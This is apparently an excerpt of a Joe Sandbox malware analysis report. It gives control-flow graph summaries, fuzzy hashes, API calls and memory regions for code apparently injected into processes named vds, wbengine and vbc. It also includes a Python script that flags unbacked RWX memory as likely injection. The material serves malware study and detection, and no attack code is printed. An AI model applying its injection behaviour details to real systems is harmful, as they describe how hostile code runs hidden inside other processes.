• Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction Fuzzy Hash: 07D1063152CB0D8FCB28FF58D8857EAB7E1FBA0310F5846AED846C3265DA74964586C2

Control-flow Graph

• Executed
• Not Executed
• Control-flow graph data omitted (rendered by the interactive graph viewer in the original report); entry block b78070-b7817e, basic blocks in the range b78077-b78335; API calls shown in the graph: CloseHandle (b78186), GetTokenInformation (b780ca-b780d8, b781fe-b78201); internal calls to ba7164, ba715c, b75d90, b7ec00 and b91280
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
• Instruction ID: 5930bc568993b4a95766668fff78e6b9a5c1642cea6e08f120931f75834597c0
• Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
• Instruction Fuzzy Hash: B361463068CA459FC7658B28889C3357BE0FB59360F98C6DAE47FD39A1DF244C459352

Control-flow Graph

• Executed
• Not Executed
• Control-flow graph data omitted (rendered by the interactive graph viewer in the original report); entry block b75910-b75912, basic blocks in the range b75910-b75af3 plus b8072c-b8081c and b8c0cc-b8c104; no Windows API calls shown in the graph; internal calls to ba9970, b90df0, b75d90, b911a0, ba2190, b75e10 and b91280
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction ID: 3207053290701fbf9526482282ff434f60ff4b6a68a555dad520864c74726c4d
• Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction Fuzzy Hash: 51F1193171CE488FCBA9A72C58813B977D1EB99310F5885FEE05EC3296DD649C06D382

Control-flow Graph

• Executed
• Not Executed
• Control-flow graph data omitted (rendered by the interactive graph viewer in the original report); entry block b75b42-b75b47, basic blocks in the range b75b0d-b75d75; API call shown in the graph: CreateThread (b75cdf-b75ce4); internal calls to b75d90, b91280 and b752a0
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction ID: 1eb005069438cc16bbb49d397f06436c86356e7e256c01735db068c38d64b78d
• Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction Fuzzy Hash: 2D219F2020CF458FDB7B9B388888B7466D1EB54310F68C5E6847FCF2A2DAE48C449755

Control-flow Graph

• Executed
• Not Executed
• Control-flow graph data omitted (rendered by the interactive graph viewer in the original report); entry block b75b09-b75b3b, basic blocks in the range b75b09-b75d65; API call shown in the graph: CreateThread (b75bb4-b75ce4); no internal calls
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction ID: 584625b6a4da65aa77c361d93e6e842fda1500d9725b34882bf97d46de642cc0
• Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction Fuzzy Hash: C801D23050DF468FEB765A348D987797BD0EB14324F2481EB88BFCA191EEE44901A752

Control-flow Graph (entry block b75b87; graph rendering not reproduced)
APIs
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction ID: be0951479a81d0ba9becdcd651e1a9ab4f05d961e865e3bab411bf4645999281
• Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction Fuzzy Hash: 51E0863060DB448FDB6A9F245D503293AE5EB88310F1541DEC45ED72D1DFA919064786

Control-flow Graph (entry block b7599b; graph rendering not reproduced)
APIs
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: 7bcdab300da469182f06ed70b3f72e17a2fc1182f3ce63ba0b938adf785ce788
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: 8A01D67091DF84CFD6769B18448127976E1FB94320F28C5EA92AEC7192C9E44D00A342

Control-flow Graph (entry block b78090; graph rendering not reproduced)
APIs
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: ca6242b5f98d80d8dc15360a26377ca9d8f2d775a86425cf0d59cb0fb8460d07
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: 7BC08C719E89029A523A028C2C2F0F026C0C20E370FCCC0C68C3EF0E20DD248E039097

Control-flow Graph (entry block b7817f; graph rendering not reproduced)
APIs
Memory Dump Source
• Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_b70000_vds.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: 8587d28e17772083880ce630c401665a1d5c6db9ca240ad8216af06f1a6b2798
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: D0C048A59D860986513A268C2C1E0A225D0861A770F8CC492AC3EBAA62D9684D4291A2

Control-flow Graph (entry block af52a0; graph rendering not reproduced)
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 00AF53C4
Memory Dump Source
• Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: 832e427a07b7a200081a4c049776ca41ae49bbad3f516b12abd95581fde53232
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: 5E41D361D0DE9D8FD72A43F944742B47BE1AB123E6F9D02D6F7828F0E2D1984C819726

Control-flow Graph (entry block b10080; graph rendering not reproduced)
APIs
Memory Dump Source
• Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction ID: 441d4db06a8da177fd8c242ffdd47ac298c2924ab895320c65ac886c6804de01
• Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
• Instruction Fuzzy Hash: DFD11631428B0D8BC724FF58D8857EAB7E1FBA4310F98469FE846C7164DAB496C586C2

Control-flow Graph (entry block af8070; graph rendering not reproduced)
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction ID: 4302a882a7498e268821ff00b8d004031a4bb63b379a53230e5ce71ed373f2c7
                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction Fuzzy Hash: DE61313060CA4D9FC7658BE8881427A7BB0FB55350FA8035AF35AC71A0DF3CAC499356
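The Memory Dump Source line above packs the region's process number, snapshot, base address and Win32 memory attributes into the .sdmp file name. The parser below is an added example (not Joe Sandbox code and not from the sample) that decodes such a line and applies the triage rule an analyst uses on these entries: committed, private, writable-and-executable memory that is not backed by a PE is the usual footprint of injected code. The field layout is an assumption inferred from this report (process 35 and snapshot 2 agree with the snapshot name hcaresult_35_2_af0000_wbengine.jbxd; the third and eighth fields are treated as opaque), while the protection, state and type constants are documented Windows values. The second input line in the demo is constructed, not from the report.

```python
import re
from dataclasses import dataclass

# Win32 memory constants (documented Windows values, not taken from the report).
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

EXECUTABLE = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITABLE = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Assumed .sdmp name layout (inferred from this report, not documented here):
#   <process>.<snapshot>.<opaque>.<base>.<protect>.<state>.<type>.<opaque>.sdmp
_SDMP = re.compile(
    r"^(?P<process>[0-9A-Fa-f]{8})\.(?P<snapshot>[0-9A-Fa-f]{8})\.(?P<f3>[0-9A-Fa-f]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)
_SOURCE = re.compile(
    r"Source File:\s*(?P<name>\S+?),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)",
    re.I,
)


@dataclass(frozen=True)
class DumpRegion:
    process: int
    snapshot: int
    base: int
    protect: int
    state: int
    mem_type: int
    based_on_pe: bool


def parse_source_line(line: str) -> DumpRegion:
    """Decode one 'Source File: <name>.sdmp, Offset: <hex>, based on PE: <bool>' line."""
    m = _SOURCE.search(line)
    if not m:
        raise ValueError("not a Memory Dump Source line: %r" % line)
    n = _SDMP.match(m.group("name"))
    if not n:
        raise ValueError("unrecognised .sdmp name: %r" % m.group("name"))
    base = int(n.group("base"), 16)
    if base != int(m.group("offset"), 16):
        raise ValueError("base in file name disagrees with the Offset field")
    return DumpRegion(
        process=int(n.group("process"), 16),
        snapshot=int(n.group("snapshot"), 16),
        base=base,
        protect=int(n.group("protect"), 16),
        state=int(n.group("state"), 16),
        mem_type=int(n.group("mtype"), 16),
        based_on_pe=m.group("pe").lower() == "true",
    )


def triage(region: DumpRegion) -> list[str]:
    """Return the injection indicators the region exhibits (empty list = nothing notable)."""
    flags = []
    if region.protect & EXECUTABLE and region.protect & WRITABLE:
        flags.append("rwx")        # writable and executable: freshly written shellcode or PE
    elif region.protect & EXECUTABLE:
        flags.append("executable")
    if region.mem_type & MEM_PRIVATE:
        flags.append("private")    # VirtualAlloc'd memory, not a mapped file or loaded image
    if region.state & MEM_COMMIT and not region.based_on_pe and not (region.mem_type & MEM_IMAGE):
        flags.append("unbacked")   # committed memory with no image on disk behind it
    return flags


def is_injection_candidate(region: DumpRegion) -> bool:
    """Executable, private, image-less committed memory is the classic injected-code footprint."""
    f = triage(region)
    return ("rwx" in f or "executable" in f) and "private" in f and "unbacked" in f


if __name__ == "__main__":
    # First line is taken from this report; the second is a constructed image-backed counterexample.
    for text in (
        "Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, "
        "Offset: 00AF0000, based on PE: false",
        "Source File: 00000023.00000002.1.0000000000400000.00000020.00001000.01000000.00000000.sdmp, "
        "Offset: 00400000, based on PE: true",
    ):
        r = parse_source_line(text)
        print(hex(r.base), triage(r), "INJECTION CANDIDATE" if is_injection_candidate(r) else "ok")
```

Run against the line above, the region at 0xAF0000 in process 35 decodes as PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE with no PE behind it and is flagged, whereas a PAGE_EXECUTE_READ MEM_IMAGE region is not.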

Control-flow Graph (rendered graph and raw block list omitted): entry af5910; basic blocks af5910-af5af3, with out-of-line blocks at b006b3-b0081c and b0c0cc-b0c104; internal calls b29970, b10df0, af5d90, b111a0, b22190, af5e10, b11280; no API call annotated.
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 0ce013dd0779991b5a9cb183f368e13f282b7d9bf3265130926d065048f0899e
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF11930B1CE4C8FC669A76C58953F977D2EB99310F9845DEE14BC3296DD289C86C382

Control-flow Graph (rendered graph and raw block list omitted): entry af5b42; basic blocks af5b0d-af5d75; API call CreateThread (af5cdf); internal calls af5d90, b11280, af52a0.
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 0ea1b1d3666e5d3962ef83757e63ab52d24b1d9a5434bee42b9a8a07eec59723
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: A621E030E0DF4D8FCB699BF884487742BF1AB55310F6901A6B347CF2A2DA24CC869356

Control-flow Graph (rendered graph and raw block list omitted): entry af5b09; basic blocks af5b09-af5d65; API call CreateThread (block af5bb4-af5ce4); no internal calls annotated.
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 950dbc865154bff8231ed1eda9c072857f01271fa159ad2ec6205f7568985991
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019630D0EF4E8FDB6597F48C1437577E0AB50324F25019BF787CA095EA644902A752

Control-flow Graph (rendered graph and raw block list omitted): entry af5b87; basic blocks af5b87-af5d65; API call CreateThread twice (af5b87-af5b99 and block af5bb4-af5ce4); no internal calls annotated.
APIs: CreateThread
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: bc81f6a44b8d6bd1e36021e0f6cbd9ba13e2d345395d5a5f7ea2109490dd713b
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 81E08630A0DF4C4FDB599B7498103393AE5FB88314F1501CED64AD71D1EF6909064792

Control-flow Graph (rendered graph and raw block list omitted): entry af599b; basic blocks af5932-af5af3; internal calls b111a0, b22190, b29970, b10df0, af5d90, af5e10, b11280.
APIs: wcscpy
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: e8ec47810cc1d9345c5b4f160e46f6ec77c4e807e78d5e972b9b8e9b359d5a0f
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: C601D670E1DE9CCFD61EA7F854C927969A1BB94360F68059BB38EC7092D9A44D00DB41

Control-flow Graph (rendered graph and raw block list omitted): entry af8090; basic blocks af8077-af8335; API calls CloseHandle (af8186) and GetTokenInformation (af80ca, af81fe); internal calls b2715c, af5d90, afec00, b11280, b27164.
APIs: CloseHandle
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 316aa7c0016b23a6cc6b9bbb7f50e317cbf25473d3819bcfff1fcd0cf612d890
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: B0C08C70128C0EA7533803C80C0B0B0A6248202B90B0C0306FE06C0230EE0C8E03009F

Control-flow Graph (rendered graph and raw block list omitted): entry af817f; basic blocks af8077-af8335; API calls CloseHandle (af8186) and GetTokenInformation (af80ca, af81fe); internal calls b2715c, af5d90, afec00, b11280, b27164.
APIs: CloseHandle
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000023.00000002.2624154980.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_35_2_af0000_wbengine.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 8dcaae30b613d6a80f4d79af520d4b4670bafa5a90852e1e36fe3f391379409a
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 86C092B455890D97533827C82C0B4B2B5684613BA0F0C4712FF1A9A370EE5C4D4341AB

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f call 40ad88 call 40ad82 0->6 12 401dc3-401ed4 CloseHandle call 401650 call 40b84d call 40af66 6->12 13 401c55-401c6c call 401650 6->13 51 401ed6-401eed call 40ba30 12->51 52 401eef 12->52 17 401c73-401c77 13->17 19 401c93-401c95 17->19 20 401c79-401c7b 17->20 24 401c98-401c9a 19->24 22 401c7d-401c83 20->22 23 401c8f-401c91 20->23 22->19 25 401c85-401c8d 22->25 23->24 27 401cb0-401cce call 401650 24->27 28 401c9c-401caf 24->28 25->17 25->23 33 401cd0-401cd4 27->33 35 401cf0-401cf2 33->35 36 401cd6-401cd8 33->36 39 401cf5-401cf7 35->39 37 401cda-401ce0 36->37 38 401cec-401cee 36->38 37->35 40 401ce2-401cea 37->40 38->39 39->28 41 401cf9-401d09 call 40ad7c 39->41 40->33 40->38 41->12 47 401d0f 41->47 50 401d10-401d2e call 401650 47->50 59 401d30-401d34 50->59 55 401ef3-401f1a call 401300 51->55 52->55 70 401f1c-401f2f 55->70 71 401f5f-401f69 55->71 61 401d50-401d52 59->61 62 401d36-401d38 59->62 63 401d55-401d57 61->63 64 401d3a-401d40 62->64 65 401d4c-401d4e 62->65 63->28 66 401d5d-401d7b call 401650 63->66 64->61 68 401d42-401d4a 64->68 65->63 78 401d80-401d84 66->78 68->59 68->65 73 401f33-401f5d call 401560 70->73 74 401f73-401f75 71->74 75 401f6b-401f72 71->75 73->71 76 401f92-4021a4 call 40ba30 call 40b84d call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 74->76 77 401f77-401f8d call 401560 74->77 75->74 76->5 106 4021aa-4021c0 76->106 77->76 82 401da0-401da2 78->82 83 401d86-401d88 78->83 88 401da5-401da7 82->88 86 401d8a-401d90 83->86 87 401d9c-401d9e 83->87 86->82 89 401d92-401d9a 86->89 87->88 88->28 90 401dad-401dbd call 40ad7c 88->90 89->78 89->87 90->12 90->50 108 4021c6-4021ca 106->108 109 40246a-402470 106->109 108->109 112 4021d0-402217 call 4018f0 108->112 110 
402472-402475 109->110 111 40247a-402480 109->111 110->111 111->5 113 402482-402487 111->113 117 40221d-40223d 112->117 118 40244f-40245f 112->118 113->5 117->118 122 402243-402251 117->122 118->109 119 402461-402467 call 40b6b5 118->119 119->109 122->118 125 402257-4022b7 call 401870 * 2 call 4018d0 122->125 135 4022c3-40232a call 4018d0 call 40b350 125->135 136 4022b9-4022be call 40ad90 125->136 146 402336-40234d call 4018d0 135->146 147 40232c-402331 call 40ad90 135->147 136->135 184 40234e call 730d007 146->184 185 40234e call 730d01d 146->185 147->146 151 402350-402352 152 402354-402355 SafeArrayDestroy 151->152 153 40235b-402361 151->153 152->153 154 402363-402368 call 40ad90 153->154 155 40236d-402375 153->155 154->155 157 402377-402379 155->157 158 40237b 155->158 159 40237d-40238f call 4018d0 157->159 158->159 182 402390 call 730d007 159->182 183 402390 call 730d01d 159->183 162 402392-4023a2 164 4023a4-4023a9 call 40ad90 162->164 165 4023ae-4023b4 162->165 164->165 167 4023b6-4023b8 165->167 168 4023ba 165->168 169 4023bc-4023fe 167->169 168->169 180 402401 call 730d007 169->180 181 402401 call 730d01d 169->181 170 402403-40242c call 4019a0 175 402436-402445 call 4019a0 170->175 176 40242e-402433 170->176 175->118 179 402447-40244c 175->179 176->175 179->118 180->170 181->170 182->162 183->162 184->151 185->151
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
